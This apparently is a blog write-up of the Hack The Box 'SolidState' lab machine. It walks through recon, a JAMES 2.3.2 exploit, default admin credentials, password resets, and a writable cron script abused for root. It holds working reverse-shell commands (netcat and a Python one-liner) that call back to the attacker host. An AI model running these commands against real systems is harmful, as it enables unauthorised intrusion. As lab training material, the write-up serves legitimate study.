HTB: SolidState

Details

This machine is SolidState from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-01 14:10 EDT
Nmap scan report for 10.10.10.51
Host is up (0.038s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp        JAMES smtpd 2.3.2
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.66 seconds

User

A potential exploit for james https://www.exploit-db.com/exploits/35513, so I updated the payload to be

nc 10.10.14.15 4444 -e /bin/bash

And ran it

root@kali:~# python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

So I set a listener for if it fires at some point

root@kali:~# nc -nlvp 4444

I checked the site on port 80

Screenshot 1

And then tried the james admin using the default creds

root@kali:~# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id: root
Password: root
Welcome root. HELP for a list of commands

I could login, so I looked for users

listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin

So I reset all the passwords

setpassword james james
Password for james reset

setpassword thomas thomas
Password for thomas reset

setpassword john john
Password for john reset

setpassword mindy mindy
Password for mindy reset

I then logged into them to check for mail

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user john
+OK
pass john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

So I mindy might have a password in their mail

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user mindy
+OK
pass mindy
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.

So creds of

mindy:P@55W0rd1!2@

I tried that on ssh

root@kali:~# ssh mindy@10.10.10.51 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
[SNIP]

So my terminal was full of weird stuff, but back in my listener

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 54776

A shell had been fired back

id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

So I upgraded it

python -c "import pty;pty.spawn('/bin/bash')"
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 

With a nicer shell, I grabbed the user flag

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la
total 28
drwxr-x--- 4 mindy mindy 4096 Sep  8  2017 .
drwxr-xr-x 4 root  root  4096 Aug 22  2017 ..
-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_history
-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_logout
-rw-r--r-- 1 root  root   338 Aug 22  2017 .bash_profile
-rw-r--r-- 1 root  root  1001 Aug 22  2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 bin
-rw------- 1 root  root     0 Aug 22  2017 .rhosts
-rw------- 1 root  root     0 Aug 22  2017 .shosts
drw------- 2 root  root  4096 Aug 22  2017 .ssh
-rw------- 1 mindy mindy   33 Sep  8  2017 user.txt

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
[REDACTED]

Root

So I looked for world writable files

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find / -perm -2 -type f 2>/dev/null
/opt/tmp.py
[SNIP]

So I took a look

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

So I will overwrite it with a reverse shell and see if any user runs it with cron

root@kali:~# nc -nlvp 5555

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/tmp.py

And after a bit of waiting

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.51] 60444
/bin/sh: 0: can't access tty; job control turned off
# 

A shell

# id
uid=0(root) gid=0(root) groups=0(root)

It was a root shell. So I grabbed my flag

# cd /root
# ls -la
total 56
drwx------  8 root root 4096 Sep  8  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
-rw-------  1 root root    1 Dec 23  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  8 root root 4096 Aug 22  2017 .cache
drwx------ 10 root root 4096 Aug 22  2017 .config
drwx------  3 root root 4096 Aug 22  2017 .gnupg
-rw-------  1 root root 2946 Sep  8  2017 .ICEauthority
drwx------  3 root root 4096 Aug 22  2017 .local
drwxr-xr-x  2 root root 4096 Aug 22  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   33 Aug 22  2017 root.txt
-rw-r--r--  1 root root   66 Aug 22  2017 .selected_editor
drwx------  2 root root 4096 Aug 22  2017 .ssh

# cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *